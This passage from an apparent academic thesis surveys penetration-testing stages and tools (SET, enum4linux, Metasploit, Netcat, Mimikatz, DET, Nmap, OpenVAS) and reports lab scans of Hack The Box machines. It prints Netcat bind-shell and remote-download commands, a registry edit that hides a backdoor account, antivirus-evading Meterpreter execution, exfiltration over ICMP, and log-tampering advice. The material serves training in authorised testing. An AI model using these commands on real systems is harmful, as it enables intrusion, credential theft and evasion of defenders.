required to learn about the targets. The discovery and enumeration phases draw on competing intelligence and involves unauthorized internal and external scanning. Exploitation and gaining access. Gaining access to target devices requires the exploitation of vulnerabilities found during the discovery and enumeration phases. There are two main classifications of attacks. The first is a direct attack where a target network’s vulnerabilities are exploited to gain access to potentially critical systems, or to obtain information that can be used to launch indirect attacks. The second is an indirect attack, which occurs when an attacker uses sequential attacks to compromise the target/s. An example of this is spear phishing and waterholing attacks (Sood & Enbody, 2014, pp. 37-44).Patel (2013) references the Social Engineering Toolkit (SET), which is installed by default on the Kali Linux distribution and is a diverse toolset for social engineering attacks. The toolkit is capable of both creating emails, malicious attachments and creating/hosting phishing web pages, also known as a web attack vector. SET contains a mass-emailing option where a penetration tester can send a phishing email to many email addresses within an organization at once (Patel, 2013, pp. 37-44). The SET has a list of website templates that can be used as a web attack vector, but it is also capable of cloning websites when a URL is provided. The tool performs a get request and grabs the HTML code of the website, performing the cloning process based on that information. Using tools like SET can assists in testing the employees of an organization and their ability to recognize phishing email attempts. If a user were to give up their login credentials of a website, such as their work Office 365 login, the penetration tester would have the user’s credentials for their organization. If the user had administrative permissions, either locally on their computer or on the domain, the penetration tester will be able to utilize those credentials to gain access to the organization’s network (Patel, 2013, pp. 37-44). When looking for information on a machine or for ways to access a machine, the tool enum4linux is a great source for enumerating lightweight directory access protocol (LDAP) and the server message block (SMB) service. Using valid non-administrative or administrative credentials, it is possible to find an accessible SMB share and, depending on the permissions, find a share that can be modified or even utilize to execute remote commands. If a domain controller server is enumerated, the penetration tester could obtain a list of all active directory (AD) users, groups, devices and shares. This is a step to perform either during enumeration and/or post exploitation. If the tester does not have a username and password, it is still possible to find shares and information open to the active directory (AD) group ‘everyone’. The ‘everyone’ group can be an AD or local group and allows anyone to access the resource it is assigned to, regardless of whether they have an active directory account. In the instance of a file share that allows members of the ‘everyone’ group to access, a tester can compromise the security of the file share using enum4linux. If the tester has already exploited and compromised a workstation and/or has credentials, those credentials can be used to discover and access more shares on a network depending on the permissions of the compromised credentials. Output for the enum4linux -help page can be found in Figure 4, located in Appendix B (Velu, 2017, pp. 124-125).In the realm of exploitation, Metasploit is the most commonly used tool for executing exploits against known vulnerabilities. There are two versions of Metasploit, Metasploit Pro which is the paid version and requires a license, and Metasploit Framework which is a free version and is automatically installed in all Kali Linux distributions. “Metasploit is currently the world's leading penetration-testing tool, and one of the biggest open-source projects in information security and penetration testing. It has totally revolutionized the way we can perform security tests on our systems” (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, which is a managed security services provider (MSSP) and security product vendor, owns Metasploit Pro and Framework (Condon, 2019).The Metasploit Framework (MSF) is broken up into directories of modules. Each directory has modules that serve a specific purpose, whether it is scanning, auxiliary functions, exploitation, or post-exploitation. When a penetration tester is trying to gain access to a device, the extensive library of exploitation modules in Metasploit Framework is second to none. The exploit database is constantly being updated with new modules. The command for updating MSF is ‘msfupdate’. The tool can also be installed on Windows and MacOS (Teixeira, Singh, & Agarwal, 2018, pp. 8-17).Metasploit Framework modules are executed using the ‘use’ command and adding the path of the module that is needed. MSF users can perform keyword searches of modules by typing ‘search’ and then the keyword they are looking for. An example is typing ‘search SQL’ and hitting enter, which will list all of the modules that include SQL in the name or in the description of the module. When executing modules, the settings of the module need to be set before entering the command ‘run’. See Figure 5, located in Appendix B, for an example of setting and executing a Metasploit module (Teixeira, Singh, & Agarwal, 2018, pp. 8-17).Persistence and spreading. Spreading across the network includes gaining access to other servers, workstations and whole networks once the penetration tester has gained access to one or more devices. Persistence involves setting up a backdoor into the machine or machines for future access. EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures: Web Application and Data Servers. The Netcat chapter of the book provides the reader with steps to setup up a backdoor on a compromised computer using either the TFTP port or through an injected URL. An example is using Netcat to send a webserver the following URL: :\ (EC-Council, 2017, p. 54). The URL asks the webserver to show the attacker the listings in the C drive utilizing Windows’ cmd.exe. Once the pentester has established a command prompt on the target machine, the TFTP port can be used to upload Netcat to the internet information service (IIS) server using the following command: ’sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe (EC-Council, 2017, p. 54). The URL asks the tester’s computer for nc.exe, which is Netcat, and to import it to the IIS server. Once Netcat is uploaded to the Internet Information Service (IIS) server, it can be executed to become a backdoor by listening on a specific port for commands from the attacker’s computer. An example of such a command is nc -L -p 12345 -d -e cmd.exe. Respectively, the options mean to wait and listen for a connection on port 12345, close any connections on the mentioned port, and to execute cmd.exe (EC-Council, 2017, p. 54).If there is a file share that is open, or if the penetration tester accessed a file share with ‘modify’ permissions, it is possible to import Netcat to the target device and execute a remote shell. Once the penetration tester has accessed the target devices file share, the pentester runs one the following command on a Windows machine; nc -l -p 6996 -e cmd.exe. For a Linux machine, the command is the same with the exception of cmd.exe, which is replaced with /bin/bash. The command nc calls Netcat, the -l mean listen, -p 6996 means port 6996, -e cmd.exe means to execute the mentioned file. This initiates Netcat to listen on the port and execute the terminal or command prompt. Since Netcat is listening on port 6996 and would run the commands it receives in the OS’s command line interface (CLI), the penetration tester would run the following command on their device; nc <target IP> 6996. This initiates a Netcat connection between the tester’s machine and the target machine (Yerrid, 2013, pp. 33-35). Because IIS can have remote code execution vulnerabilities, depending on the version of IIS running, the penetration tester could utilize the Netcat tool to gain access to the server and establish a hidden persistence on a vulnerable server as part of a penetration test. This only gives the tester the same permissions as the application running, thus a privilege escalation might be required to gain administrative access to the Windows server (EC-Council, 2017, p. 54).Mimikatz is a well-known tool that can perform a multitude of functions to assist in escalating privileges, gaining initial access, and gaining additional active directory information regarding user accounts and group policies. Mimikatz is also known for its ability to perform the infamous pass-the-hash function which exploits a vulnerability in the original NTLM that required only the hash of the password to be correct instead of the password itself when authenticating to Windows devices. It is not only important to understand how NTLM functions and what tools can exploit its vulnerabilities but understanding how to use the tool is essential for a penetration tester, and that is why author gives several other examples of the tool’s use in a real scenarios (Sharma, 2017, pp. 238-240).Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT, NTLMv1 and NTLMv2 hashes, and the tool syntax for John the Ripper and Hashcat for cracking the mentioned hashes. Halton & Weaver (2016) explained the history of each hash and reviewed steps for cracking the credentials in detail. NT hashes are the oldest hashes used for Windows to authenticate to a domain and are more easily cracked due to their age and simplistic algorithm. NTLM, also known as NTHash, is a little harder to crack, and is standard on most modern Windows machines. Luckily, cracking this hash is not always necessary. NTLM’s most notable vulnerability is the pass-the-hash technique where an attacker can simply sniff the hash and send the hashed password to a device for authentication. The device will query the domain controller with the hash to make sure the hashes match. If hashes match, then the credentials are accepted. LM and NT are ways that Windows devices store passwords on the machine itself. The commands to crack LM utilizing Hashcat and JTR are as follows:Hashcat = hashcat -m 3000 -a 3 wordlist.txt (Steube, 2019)John the Ripper = john –format=lm wordlist.txt (Halton & Weaver, 2016, pp. 223-225)The Commands for cracking NTHash using Hashcat and JTR are as follows:John the Ripper = john –format=nt wordlist.txt (Halton & Weaver, 2016, pp. 223-225)Hashcat = hashcat -m 1000 -a 3 wordlist.txt (Steube, 2019).NTLMv1, also known as Net-NTLM, is a protocol that allows Windows machines authenticate to a domain. This is an older version of domain authentication and is now deprecated, but older networks or networks with older hardware/software may still be using this version. NTLMv2 is the more secure version and has been the default method used since Windows 2000 (Clercq, 2004). The commands for cracking NTLMv1 are as follows; John the Ripper = john –format=netntlm wordlist.txt, Hashcat = hashcat -m 5500 -a 3 wordlist.txt. The commands for cracking NTLMv2 are as follows; John the Ripper = john –format=netntlmv2 wordlist.txt, Hashcat = hashcat -m 5600 -a 3 wordlist.txt (Steube, 2019). Snood & Enbody (2014) explain the process of gaining and maintaining access to a computer often does not require a direct attack. The authors explain the principles behind the use of phishing emails to gain access to a target machine. In the spear phishing model that the author presents, located in Appendix B as Figure 6, the attacker sends an email to the target user, but the email contains malicious attachment/s that will infect the target computer with a RAT (Remote Access Trojan). A RAT provides the attacker with a backdoor into the target machine. Once the RAT is on the target machine, it will either spread itself across the target network, or the attacker will utilize the RAT to spread more RATs across the network (Sood & Enbody, 2014, p. 23).If the attacker is not caught by an IDS/IPS, then they will eventually find a server that holds sensitive data as they spread the RAT across the target network, and at that point, the attacker will have the ability to exfiltrate sensitive data in a manner, which will allow the attacker to elude detection. This completes the attack in the spear phishing method example, but there are steps after exfiltration. One of the steps that usually follows exfiltration is covering of tracks which includes deleting logs of the activity, removing any malware that was used to gain access to the machine, and reversing any changes made to the machine’s configuration (Sood & Enbody, 2014, p. 23).Another way to maintain persistence and exfiltrate data from a target device is to create a new user account and add the account to local and domain groups. This will help the penetration tester blend-in with the rest of the activity happening on the computer. The account will want to be hidden, and in order to hide the new account, the following registry edit needs to be performed; Reg Add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList /V account_name /T REG_DWORD /D 0. The registry path can vary depending on the version of Windows running on the target machine, but the general idea is the same (Velu, 2017, pp. 471-473).Data gathering and extraction. Netcat can exfiltrate data from a target device. In order to perform this function, the Netcat remote shell needs to have a connection to the attacker’s computer. The penetration tester also needs to know the path to the folder where the file needing to be exfiltrated rests on the target device. In order to import the file, the ‘tail’ command is used. For example, if a penetration tester wanted to dump the Linux passwd file, they would run the following command; tail /etc/passwd (Yerrid, 2013, pp. 40-41). In turn, the attacker can crack the password file offline and at their leisure. An issue with data exfiltration is the risk of being caught by data loss prevention. Random access memory (RAM) holds a significant amount of information for an attacker. Tools like Belkasoft RAM Capturer and MandiantMemoryze can capture system memory, which allows it to be downloaded as a single image file. Both tools are uploaded to the compromised machine and used to perform the download of the system’s memory (Velu, 2017, p. 393).If a penetration tester is trying to capture the active memory of a target, they would most likely get caught by endpoint protection. In order to avoid this, Metasploit’s Meterpreter has commands that can run the executable completely in the target machine’s memory using the following command; execute -H -m -d calc.exe -f. The command runs the calculator app (calc.exe) as a decoy executable and will upload the memory acquisition program in the system’s memory. Because a dummy program executes the memory acquisition program, it avoids anti-virus. The memory acquisition program does not show up as a running process because it is run in system memory, which assists in avoiding IDS/IPS (Velu, 2017, pp. 394-395).When exfiltrating information from a target on an organization’s domain, the security account manager (SAM) database is a prime target. The SAM database contains the usernames and passwords for the Windows operating system. The passwords are stored as LM or NTLM hashes in the registry hive. The file path for the SAM is %SystemRoot%/system32/config/SAM, and the file share for the SAM is mounted at HKLM/SAM (Teixeira, Singh, & Agarwal, 2018).Metasploit has a module called Smart Hashdump that can import the password hashes from the SAM database to the penetration tester’s machine where the tester can crack hashes offline. Once the meterpreter shell is running on the target device and the shell has been placed in the background of the tester’s terminal, the tester can run the Smart Hashdump module at the following Metasploit path; post/windows/gather/smart_hashdump. Once the module settings have been set and the module has finished running, the Windows password hashes are placed into a file on the tester’s machine (Teixeira, Singh, & Agarwal, 2018, pp. 198-200).Lastly there is the data exfiltration toolkit (DET), which is a tool designed to test data loss prevention (DLP). DET can exfiltrate data using different protocols and social media such as Gmail and Twitter. DET uses a client-server architecture, so a server needs to be setup on the tester’s machine and then a client needs to be installed on the target machine. Valu (2016) provides the steps for downloading and configuring the DET tool for use. The tool is downloaded from GitHub using the command ‘git clone ’. Once the repository is cloned and the tester has navigated to the directory, the tester can use the command ‘pip install -r requirements.txt’ and then the command ‘python det.py’ to complete the installation of the tool. This is necessary because DET is not installed on Kali Linux by default (Velu, 2017, pp. 469-471). The tester can start the DET server using the following command; python det.py -c ./config-sample.json -p icmp -L. This command starts the server with the configuration set to listen for packets over Internet control message protocol (ICMP). The config-sample.json in the command is the configuration file. Once the setup is complete, the tester can exfiltrate data from the target over ICMP protocol, which will obfuscate the traffic by making it look like a ping, which helps evade DLP (Velu, 2017, pp. 469-471).Covering tracks. Removing evidence and indicators of compromise is the second to last step of a penetration test. Log deletion and removal of installed software is part of covering the tracks left by a penetration test. Log deletion during the penetration test is part of maintaining stealth on the network to IDS and IPS (Allen & Cardwell, 2016, pp. 331-344).When cleaning up log files and modifying registry settings and values are important when trying to avoid detection. Deletion of a log file is more suspicious than a modification of a log file, especially if the modification is performed with system level permissions on a Windows server, or root permissions on a Linux device. It is advisable to modify logs instead of deleting them (Allen & Cardwell, 2016, pp. 331-344).Removing software, programs, script files and applications used for testing is also an important step because the software could be used in the future by malicious attackers to compromise the organization. Leaving the network clean and pristine once testing concludes shows the organization that the tester possesses professionalism and attention to detail. A common issue faced during post-test clean-up activities is remembering everything that needs to be removed or reconfigured. Keeping detailed records and logs of the test, including what software, programs, script files and applications placed on the target devices, will assist in cleanup after testing has concluded. Detailed records also assist in creating the penetration test report for the organization (Allen & Cardwell, 2016, pp. 331-344).Discussion of the FindingsThe purpose of this research was to provide guidance regarding the steps for performing a penetration test using the most common open-source tools in the three main fields of penetration testing; wireless, web application, and Intranet. This guidance is for those who possess a deep understanding of the technical aspects of IT, are passionate about cybersecurity and want a starting framework that they can utilize in the development of their own penetration testing methodology. In order to demonstrate the benefits of these tools, thy need to be tested. In this section, the tools that are tested are: Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and 10.10.10.157 use Linux operating systems. 10.10.10.169 is a Windows device.Wireless Tool BenefitsThe Aircrack-ng toolset and Kismet tool are the two most commonly used toolsets for wireless penetration testing given their wide range of capabilities and easy-to-use command line interfaces. Aircrack-ng hosts multiple tools within its toolset that perform different functions regarding wireless security testing, credential harvesting and end-point compromise. Kismet is another wireless security tool known for its ability to assess the security protocols of wireless networks without connecting to them, as well as identifying networks that are not on the IEEE 802.11 standard spectrum. Web Application Testing ResultsIn web application security testing, there are four main tools used; OWASP’s ZAP, Nikto, SQLMap, and Burpsuite. Each tool is special in its capabilities and user interface. ZAP and Burpsuite utilize a graphical user interface (GUI) where SQLMap uses a CLI. Zap uses both automatic and manual web application security scanning, while Burpsuite utilizes manual testing as a proxy between the tester’s browser and the web application. ZAP and Burpsuite focus on the web application security testing in a broad sense, where SQLMap focuses on SQL vulnerabilities within the web application. These are the most commonly used tools for web application security testing and penetration testers will be required to familiarize themselves with these tools and how they function in order to be a well-rounded tester. The first tool tested for web application security was Nikto. To run the initial scan, the first command was ‘Nikto –host 10.10.10.157’. The default port is 80 for Nikto if there is not a specified port in the command. Port 80 was found to be an open port during the Nmap scan that was run during discovery and enumeration in the next section. The results of the Nikto scan are shown in Figure 7. Figure 7. Nikto Command and Output From a Generic ScanNikto found that the Apache version is out of date and could contain vulnerabilities that a tester can research online. The Nikto scan also displays the types of HTTP methods that the web application allows. The HTTP POST method can be a vulnerability if there were a login for that website where password spraying may occur. ZAP testing resulted in the discovery that the new Kali Linux version does not contain ZAP by default, so to install ZAP, the following command must be used ‘apt-get install owasp-zap’. Once the installation was complete, the command ‘owasp-zap’ started the program. From the home screen, the automated scan was selected, which was where the specifics were entered. See Figure 8 for a screenshot of the configuration page. See figure 8 and 9 for the results of the scan.Figure 8. ZAP Automated Scan Configuration ScreenNote: This screenshot illustrates the input of variables into the scan configuration screen.Figure 9. ZAP Automated Scan ResultsNote: This figure illustrates the results of the scan and the tabbed options that show various other result information.ZAP searches for known common URL paths and presents the findings, which can be sorted for convenience. An example would be Figure 9, which shows the column ‘Reason’ sorted to show the ‘OK’ reason at the top. This mean that the URL exists and returned results when tested. Much like Nikto, ZAP scans for many URLs and other criteria to present.Intranet Security Testing ResultsThe tools for Intranet testing depend on the stage of testing that the penetration tester is working. The stages of a penetration test are discovery, enumeration, exploitation, privilege escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014, pp. 60-66). Each stage has a set of tools that work best for what the analyst is trying to accomplish. Nmap is the most recommended tool for discovery scanning and vulnerability enumeration. Nmap has been around since 1997 and has been improved over the years so it can perform a wide range of functions. Syntax for the tool is straight-forward and there is no shortage of resources that can guide a new penetration tester to the best scan for the environment they are testing. Between live asset discovery, open port scanning, service version detection, OS fingerprinting, built-in scripts and scripting capabilities, there are few operations this tool cannot perform (Lyon, 2008). When testing Nmap, a tester must perform scans of devices on a network. The first command run was ‘nmap –v –p- 10.10.10.157 –oG 157portscan.txt’. This scans all of the ports on the device and outputs the results to the 157portscan.txt file. Once Nmap displayed the open ports in the output, a service version scan was run that also obtains the info for the OS and runs Nmap scripts. See Figures 8 and 9 for Nmap command and results.Figure 10. Nmap device enumeration commandNote: This figure illustrated the command switches that identify the service version of the listed ports and operating system.As shown in Figure 8, the Apache version of the web server running on port 80 is 2.4.29. This seems like a lower version of Apache and a penetration tester will be able research that version of Apache to find known vulnerabilities. OpenVAS is also a well-known scanning tool used specifically for vulnerability detection and exploit recommendations. It can perform automated scanning and will display vulnerability information. This is more detail than Nmap, which displays raw information that the tester must research to determine if there are vulnerabilities. When enumerating with Nmap, success boils down to a penetration tester’s familiarity with known vulnerabilities corresponding to different service versions, and their understanding of how these services function different ports. In this example, OpenVAS can be installed using the command ‘apt-get install openvas’. Once OpenVAS is installed, it needs to be setup using the command ‘openvas-setup’. After setup is complete, the login password and username will appear at the bottom of the page terminal, and the web user interface (UI) for URL was loaded. Since the login information was provided during setup, it is easy to login to the web UI. To start a scan, click on the scan tab at the top of the page, click on the tasks option in the dropdown menu, and then click on the purple task manager icon on the on the top left side (see Figure 9 for a screenshot). Figure 11. How to Start a Scan in OpenVASNote: This illustrates the icons to click to start a scan in OpenVASAt the bottom of Figure 11, the scan status is illustrated and the tool is set to refresh every 30 seconds. This begins the OpenVAS vulnerability scan of the IP 10.10.10.157. When the scan was finished, the status of the scan changed from ‘Requested’ to ‘Done’, which allows the user to view the vulnerability results as shown in Figure 12. The vulnerabilities will allow a tester to determine what offensive actions can be taken to compromise the system.Figure 12. Results From OpenVAS ScanNote: This illustrates the list of vulnerabilities found from the scan of the IP address 10.10.10.157 in OpenVASWhen working on enumeration, enum4linux is a reputable resource. When performing discovery scanning, it was determined that 10.10.10.169 has lightweight directory access protocol (LDAP) running, which is how Windows authenticates credentials on a domain. Using enum4linux with no passwords given and the –a modifier, making the command ‘enum4linux –a 10.10.10.169’, the scan returned valuable data. The most important data was the list of users in the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.Figure 13 - Enum4linux LDAP OutputNote: This lists the user accounts found in the active directory group ‘Domain Users’ during the enumeration of LDAP using enum4linuxIn addition to the list of users in the ‘Domain Users’ group, there was the list of all users within the entire domain. See Figure 12 for the screenshot of all users. Other information provided by this tool is the password policy for the domain “megabank”, which is the domain for the server. See Figure 13 for the password policy screenshot.Figure 14. Enum4linux Users OutputNote: This screenshot lists all the user accounts found on 10.10.10.169 during LDAP enumerationFigure 15. Enum4linux Password Policy OutputNote: This figure illustrates the fact that the password policy can be found in the output of the LDAP enumeration using enum4linuxEnum4linux is a useful tool that can provide valuable information when used correctly. Once the target is known and enumerated, exploitation and gaining access to the machines are the next steps. When it comes to exploitation, Metasploit is second to none. Metasploit is the most commonly used tool for exploiting vulnerabilities, as it has pre-configured exploit modules that were designed to exploit specific vulnerabilities. This allows for exploit automation and the capability for a less-advanced penetration tester to perform exploitation of vulnerabilities that would otherwise would not have had the technical capabilities to perform. The tool also includes modules for scanning, enumeration, exploitation and post-exploitation. Post-exploitation and persistence are part of what allows a penetration tester to continue a test after initial exploitation and access a machine. This includes privilege escalation, moving laterally to other machines across the intranet, monitoring and logging on devices, and the creation of backdoors for future access. Because of the multitude of tasks involved, there are tools designed to assist in the performance of each specific task, and can sometimes be dependent on the OS of the compromised machine. Obtaining and using passwords found on a machine is one way to gain access while remaining anonymous on the network. Utilizing authorized credentials allows for easier access to a machine remotely by installing backdoors, but it also allows the penetration tester to look at file shares and the security account manager (SAM) database without arousing suspicion. This is a very important step in the penetration testing methodology for initially obtaining and maintaining access. Domain user accounts provide access to any computers and file shares that the domain user has access to, which is beneficial for spreading across the network. A domain administrator account provides more access to all of the devices on the organization’s domain, including administrative permissions to all of the servers and workstations. Netcat can be used as a backdoor and for data exfiltration. Metasploit’s Meterpreter is also used for creating and maintaining a backdoor on to the machine. Meterpreter includes stealth capabilities by executing commands using dummy processes and having those processes use the Windows command shell in the background for executing commands remotely. This is one way of bypassing anti-virus (AV) and IDS. Meterpreter also has a module called Smart Hashdump that can download the local running memory of the machine for analysis. Other open-source tools in Kali Linux are made for downloading local memory, such as Belkasoft RAM Capturer and Mandiant Memoryze. Lastly, the Data Exfiltration Tool (DET) is specifically made for exfiltrating data discretely and was designed for data loss prevention (DLP) testing.Remaining undetected is critical for a penetration tester and each tool has functions designed to assist in obfuscation and stealth. Tools are not enough to remain undetected when performing a penetration test. A penetration tester must use knowledge of networking and OS operations and configurations in order to stay hidden from IDS/IPS. Creating legitimate local and AD accounts for persistence will reduce the likelihood that future activities will be viewed as suspicious by a security incident and event manager (SIEM) or user behavioral analytics (UBA). After the penetration test completes, it is important to remove anything on the organization’s network and systems that have not been removed already. This includes deleting any accounts created, resetting any permissions and registry keys modified, and removing any software or files/folders placed on devices. Cleaning up and removing anything that could be used by a real attacker in the future is part of the penetration testing process and should never be skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the organization by highlighting security weaknesses, thus increasing the organization’s security posture. When an analysis or test placing the organization at greater risk, it constitutes a failure of that test and of the testers. CommonalitiesThere were several commonalities that were found between the different penetration testing sections and toolsets. According to the Literature Review, the first step in any penetration test is intelligence gathering, regardless of which portion of an organization is being tested. Knowing as much about the organization’s operations, people, and threat vectors is necessary for a strong beginning to a penetration test. OSINT is the practice of gathering information from open-source tools and platforms, such as social media and search engines. Social engineering is one of the main reasons for performing OSINT, as it may be useful to know certain personal information in order to craft a social engineering attack that has the highest chance of successfully obtaining sensitive information. A penetration tester can easily compromise an organization by tricking one of their employees into opening a malicious attachment containing custom malware. This could compromise the machine and give the penetration tester credentials that they could use to perform other penetration tests, such as wireless or intranet testing. Another commonality was the penetration testing tools used for different testing fields. In both wireless network security testing and intranet security testing, decryption or hash-cracking was required for various reasons. John the Ripper (JTR) was suggested for hash-cracking and decryption in both wireless and physical network security as it has the capability to crack encryption and hashes for both passwords and wireless security protocols. JTR was also suggested for cracking the hashes of Windows credentials taken from a compromised machine. There are also areas where testing fields become sub-tasks for one another. For example, there may be web applications discovered during in an intranet a penetration test. Organizations often use web portals for corporate tool and resource logins, such as SolarWinds’ Orion network solution. Orion can be used as an organization’s IP Address Management (IPAM) resource, which would allow the tester to view what each subnet of the company’s intranet is used for, and even view what devices are using which IP address within those networks. This would allow the tester to focus on the high-value targets, such as the domain controller (DC), the domain name server (DNS), database servers and others.One tool that mixes wireless security testing and end-point compromise is Aircrack-ng. Aircrack-ng allows for the performance of a man-in-the-middle attacks that could either compromise a workstation or get credentials from the user. Credentials phished from a user using a fake wireless logon page, could be used during intranet security testing when the penetration tester wants to perform privilege escalation or move laterally across the network. Web application, wireless and Intranet testing merge when a web application has been compromised, which can provide credentials to access a wireless network where Intranet testing can begin. Compromising Internet-facing web applications can also provide access to the web server itself, which in-turn can provide the tester with access to an internal network depending on the way the organization has their web servers networked. Many variables determine the paths that an analyst takes during a penetration test. There are several points where wireless testing, web application testing, and intranet testing intersect during a fully scoped penetration test. Having a good toolset, along with in-depth knowledge of those tools, will provide a penetration tester with the ability to perform the test and be successful. For wireless testing, Kismet and Aircrack-ng tool suite are the tools that will provide the best results. ZAP, Nikto, SQLMap and Burpsuite are the best tools for testing web application security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools that will provide the best results during the first five stages of an intranet penetration test. Keeping detailed records and logs of the penetration test is the best practice for successfully performing the final two stages of a penetration test. ConclusionA lack of advanced knowledge and experience of cybersecurity technologies and concepts are the main factors that keep information technology professionals away from the cybersecurity industry. Knowledge of advanced information technology functions and familiarity with cybersecurity processes and technologies are required to begin a career in cybersecurity. Knowing where to begin can be difficult, and there are many separate but beneficial sources containing information about cybersecurity processes and technologies. Few sources have combined information into a penetration testing template with tool use and syntax for performing a penetration test.There is no shortage of tools available for security and penetration testing. Many tools have enough functionality, but not all of the tools are user-friendly or cover a wide range of functions. Some tools are specifically designed to test one aspect of an environment, such as wireless networks or SQL. Other tools can perform multiple functions, such as Nmap, which performs network discovery and enumeration, or Metasploit that can perform functions at every stage of the penetration testing process. Some tools are more commonly used and more popular than others, depending on their effectiveness. Because those tools are often more effective, it is beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and syntax for each of these tools. Not all the tools and toolsets are executed using the command line, but familiarity with the tool’s capabilities and operation are required for effectiveness.Understanding a tool’s capabilities and operations are only part of the process of a penetration test. An analyst must know the penetration testing process through standards and authoritative sources. The penetration testing standard is a guide that can help a new tester with the methodology and mindset required to perform a thorough and successful test and analysis of an organization’s information systems security. The ability to be inquisitive, read logs and investigate leads are a penetration tester’s personal strengths and skills outside of their toolsets. Security analysis and testing is a job for those who have a passion for cybersecurity work. An ability to think outside of the box is required when searching for vulnerabilities that everyone else has yet to find. The tester’s tools are their arsenal, which allows them to use their knowledge, inquisitiveness, and passion to perform an analysis and penetration test.There are always going to be new technologies being used by organizations around the world, and technology is always going to evolve. A pentester must constantly learn about new technologies that are available and be ready to perform an analysis and test those devices, programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an understanding of the toolsets will begin a career in cybersecurity. Continuous education is the key to a career in cybersecurity. References BIBLIOGRAPHY Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of Supercomputing.Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration Testing. Birmingham, UK: Packt Publishing.Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay, Tasmania, Australia: International Journal of of Grid and Distributed Computing.Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK: Packt Publishing.Andress, J., & Winterfeld, S. (2014). Cyber Warfare Techniques, Tactics and Tools for Security Practitioners. Waltham: Syngress.Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks Tech Docs: , B. (2015). New Media Politics: Rethinking Activism and National Security in Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (Second ed.). Birmingham, UK: Packt Publishing.Bjetlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident Detection and Response. San Francisco, California, United States: The Starch Press.Broad, J., & Bindner, A. (2014). Hacking with Kali : Practical Penetration Testing Techniques. Waltham: Syngress.Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features. Amsterdam, Netherlands: Digital Press.Condon, C. (2019). Metasploit Framework. Retrieved from GitHub: , W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia: Center for Strateic & International Studies. Retrieved from Data Science Team. (2017). Introduction to Artificial Intelligence for Security Professionals. Irvine: The Cylance Press.Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical and Computer Engineering. Retrieved from Directory of Open Access Journals.EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data Servers (Second ed.). Boston, MA: Cengage Learning.EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (Second ed.). Boston: Cengage Learning.Engebreston, P. (2013). The Basics of Hacking and Penetration Testing : Ethical Hacking and Penetration Testing Made Easy. Waltham: Syngress.Fadyushin, V., & Popov, A. (2016). Building a Pentesting Lab for Wireless Networks. Birmingham, UK: Packt Publishing.Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student Organization: , M., & Watkins, S. (2006). Hack the Stack : Using Snort and Ethereal to Master The 8 Layers of An Insecure Network. Rockland, MA, United States: Syngress.Hack the Box. (2019). About. Retrieved from Hack the Box: , W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham, UK: Packt Publishing.IBM. (2019). Data Breach. Retrieved from IBM Security : Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved from ID Theft Center: . (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association: Information Systems Security Certification Consortium. (2018). Cybersecurity Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved from ISC2: , A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments. Birmingham, UK: Packt Publishing.Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box Testing Techniques. Sikkim: International Journal of Advanced Computer Science and Applications.Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers [Internet]. Retrieved from ProQuest: , G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: LLC.Marriam-Webster. (2019). Internet. Retrieved from Marriam-Webster: , S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo Park: Herjavec Group. Retrieved from . (2017). enum4linux. Retrieved from Portcullis Labs: , G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (Third ed.). Birmingham, UK: Packt Publishing.NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center: . (2019). Red Team. Retrieved from Computer Security Resource Center: Security. (2019). Why Offensive Security. Retrieved from Offensive-Security: . (2019). Penetration Testing Methodologies. Retrieved from OWASP: , R. (2013). Kali Linux Social Engineering : Effectively Perform Efficient and Organized Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK: Packt Publishing.Pauli, J. (2013). The Basics of Web Hacking : Tools and Techniques to Attack the Web. Amsterdam, Netherlands: Syngress.PCI Security Standards. (2019). Responding to a Data Breach . Retrieved from Standard. (2012). PTES Technical Guidelines. Retrieved from Pentest-Standard: . (2012). Cracking Passwords. Retrieved from Penetration Testing Execution Standard: . (2015). OWASP ZAP User Guide. Retrieved from Github: , E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from Security Intelligence: , C. (2017). Practical Packet Analysis. San Francisco, California, United States: No Starch Press.Sharma, H. (2017). Kali Linux - An Ethical 